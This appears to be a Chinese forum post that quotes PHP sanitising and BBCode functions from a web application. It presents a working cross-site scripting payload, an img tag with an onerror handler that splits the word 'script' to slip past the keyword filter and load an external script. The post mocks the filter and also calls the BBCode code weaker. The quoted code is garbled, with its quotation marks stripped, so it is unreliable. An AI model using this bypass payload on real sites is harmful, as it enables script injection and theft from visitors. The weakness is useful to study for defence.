function checkhtml($html) {
    $html = stripslashes($html);
   
    if(!checkperm(allowhtml)) {
       
        preg_match_all("/<([^<]+)>/is", $html, $ms);

$searchs[] = <;
        $replaces[] = &lt;;
        $searchs[] = >;
        $replaces[] = &gt;;
       
        if($ms[1]) {
            $allowtags = img|a|font|div|table|tbody|caption|tr|td|br|p|b|strong|i|u|em|span|ol|ul|li|blockquote|object|param|embed;//允许的标签
            $ms[1] = array_unique($ms[1]);
            foreach ($ms[1] as $value) {
                $searchs[] = "&lt;".$value."&gt;";
                $value = shtmlspecialchars($value);
                $value = str_replace(array(\,/*), array(.,/.), $value);
                $value = preg_replace(array("/(javascript|script|eval|behaviour|expression)/i", "/(s+|&quot;|)on/i"), array(., .), $value);
                if(!preg_match("/^[/|s]?($allowtags)(s+|$)/is", $value)) {
                    $value = ;
                }
                $replaces[] = empty($value)?:"<".str_replace(&quot;, ", $value).">";
            }
        }
        $html = str_replace($searchs, $replaces, $html);
    }
    $html = addslashes($html);
   
    return $html;
}


$value = preg_replace(array("/(javascript|script|eval|behaviour|expression)/i", "/(s+|&quot;|)on/i"), array(., .), $value);


<DIV>Xss Heihei<img src="xx.gif" /onerror="var s=document.createElement(sc+ript);s.src=a.js;document.getElementsByTagName(head)[0].appendChild(s);"></DIV>
哥你懂的..


下面的就更杯具了.

<?php
function bbcode($message, $parseurl=0) {
    global $_SGLOBAL;
   
    if(empty($_SGLOBAL[search_exp])) {
        $_SGLOBAL[search_exp] = array(
            "/s*[quote][ ]*(.+?)[ ]*[/quote]s*/is",
            "/[url]s*(https?://|ftp://|gopher://|news://|telnet://|rtsp://|mms://|callto://|ed2k://){1}([^["]+?)s*[/url]/i",
            "/[em:(.+?):]/is",
        );
        $_SGLOBAL[replace_exp] = array(
            "<div><span>\1</span></div>",
            "<a href="\1\2" target="_blank">\1\2</a>",
            "<img src="image/face/\1.gif">"
        );
        $_SGLOBAL[search_str] = array([b], [/b],[i], [/i], [u], [/u]);
        $_SGLOBAL[replace_str] = array(<b>, </b>, <i>,</i>, <u>, </u>);
    }
   
    if($parseurl==2) {//深度解析
        $_SGLOBAL[search_exp][] = "/[img]s*([^[< ]+?)s*[/img]/ies";
        $_SGLOBAL[replace_exp][] = bb_img(\1);
        $message = parseurl($message);
    }
    @$message = str_replace($_SGLOBAL[search_str], $_SGLOBAL[replace_str],preg_replace($_SGLOBAL[search_exp], $_SGLOBAL[replace_exp], $message));
    return nl2br(str_replace(array(" ",    , ), array(&nbsp; &nbsp; &nbsp; &nbsp; , &nbsp; &nbsp;, &nbsp;&nbsp;), $message));
}


function bb_img($url) {
    $url = addslashes($url);
    return "<img src="$url">";
}